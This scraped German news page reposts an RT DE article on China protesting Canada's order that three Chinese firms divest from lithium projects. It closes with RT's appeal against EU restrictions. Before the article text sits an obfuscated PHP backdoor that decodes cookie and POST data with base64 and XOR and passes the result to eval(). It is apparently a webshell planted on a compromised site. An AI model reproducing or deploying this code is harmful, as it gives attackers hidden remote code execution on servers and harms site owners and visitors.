$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> China protestiert gegen Investitionsbeschränkungen Kanadas für „kritische“ Lagerstätten — RT DE – No-Zensur.de Das freie Wort für eine freie Welt
Start RT-deutsch China protestiert gegen Investitionsbeschränkungen Kanadas für „kritische“ Lagerstätten — RT DE

China protestiert gegen Investitionsbeschränkungen Kanadas für „kritische“ Lagerstätten — RT DE

0
China protestiert gegen Investitionsbeschränkungen Kanadas für „kritische“ Lagerstätten — RT DE



Ottawa hat drei chinesische Unternehmen aufgefordert, nicht in „kritische“ Lagerstätten zu investieren. Anlass dazu gaben Pläne chinesischer Unternehmen zum Abbau von Lithium. Die kanadische Regierung begründet ihr Vorgehen mit nationalen Sicherheitsbedenken. China protestiert gegen die Maßnahme.

Peking hat Ottawa in einem Protestschreiben des chinesischen Handelsministeriums an Kanada aufgefordert, die Politisierung von Wirtschafts- und Handelsfragen zu stoppen. Zuvor waren drei chinesische Unternehmen aufgefordert worden, auf Investitionen in „kritische“ Rohstoffe, darunter Lithium-Lagerstätten, zu verzichten. Chinesisches Handelsministerium wörtlich:

„Die VR China wendet sich entschieden gegen die Maßnahmen Kanadas, die die normale geschäftliche Zusammenarbeit zwischen chinesischen und kanadischen Unternehmen unter dem Vorwand der nationalen Sicherheit stören und blockieren.“

Das Ministerium wies weiter darauf hin, dass die kanadische Regierung den Begriff der nationalen Sicherheit nur vage auslege. Das Vorgehen Kanadas verstoße gegen die Marktregeln, schade den kommerziellen Interessen chinesischer und kanadischer Unternehmen und schwäche das Vertrauen der Investoren in das kanadische Investitionsumfeld, betonte das Ministerium. Vor diesem Hintergrund brachte die chinesische Seite zum Ausdruck:

„Wir fordern Kanada auf, die Bedenken Chinas ernstzunehmen, die Politisierung von Wirtschafts- und Handelsfragen zu beenden und ein faires, gerechtes, transparentes und diskriminierungsfreies Geschäftsumfeld für Investoren aus allen Ländern, einschließlich China, zu schaffen.“

Die kanadische Regierung traf die Entscheidung am 2. November, nachdem die ausländischen Unternehmen von den nationalen Sicherheitsdiensten Kanadas überprüft worden waren. Der kanadische Minister für Innovation, Wissenschaft und Industrie, François-Philippe Champagne, unterstrich:

„Während Kanada ausländische Direktinvestitionen weiterhin willkommen heißt, werden wir entschlossen handeln, wenn die Investitionen unsere nationale Sicherheit und unsere Versorgungsketten mit wichtigen Mineralien im In- und Ausland gefährden.“

In diesem Zusammenhang wurde das chinesische Unternehmen Sinomine aufgefordert, seine Investitionen im Rahmen der Power Metals Corp. zu veräußern. Das Unternehmen Chengze Lithium muss seine Investitionen an Lithium Chile Inc. aufgeben. Zangge Mining muss die Partnerschaft mit Ultra Lithium Inc. beenden. Der Aktienkurs der chinesischen Unternehmen gab nach Bekanntwerden der Maßnahmen Ottawas nach. Lithium wird unter anderem bei der Herstellung von Akkus für Smartphones oder von Batterien für Elektroautos verwendet.

Mehr zum ThemaLithium-Mine in Serbien sorgt für Unmut und Proteste – Regierung widerruft Abbau-Lizenz

Durch die Sperrung von RT zielt die EU darauf ab, eine kritische, nicht prowestliche Informationsquelle zum Schweigen zu bringen. Und dies nicht nur hinsichtlich des Ukraine-Kriegs. Der Zugang zu unserer Website wurde erschwert, mehrere Soziale Medien haben unsere Accounts blockiert. Es liegt nun an uns allen, ob in Deutschland und der EU auch weiterhin ein Journalismus jenseits der Mainstream-Narrative betrieben werden kann. Wenn Euch unsere Artikel gefallen, teilt sie gern überall, wo Ihr aktiv seid. Das ist möglich, denn die EU hat weder unsere Arbeit noch das Lesen und Teilen unserer Artikel verboten. Anmerkung: Allerdings hat Österreich mit der Änderung des „Audiovisuellen Mediendienst-Gesetzes“ am 13. April diesbezüglich eine Änderung eingeführt, die möglicherweise auch Privatpersonen betrifft. Deswegen bitten wir Euch bis zur Klärung des Sachverhalts, in Österreich unsere Beiträge vorerst nicht in den Sozialen Medien zu teilen.





Source link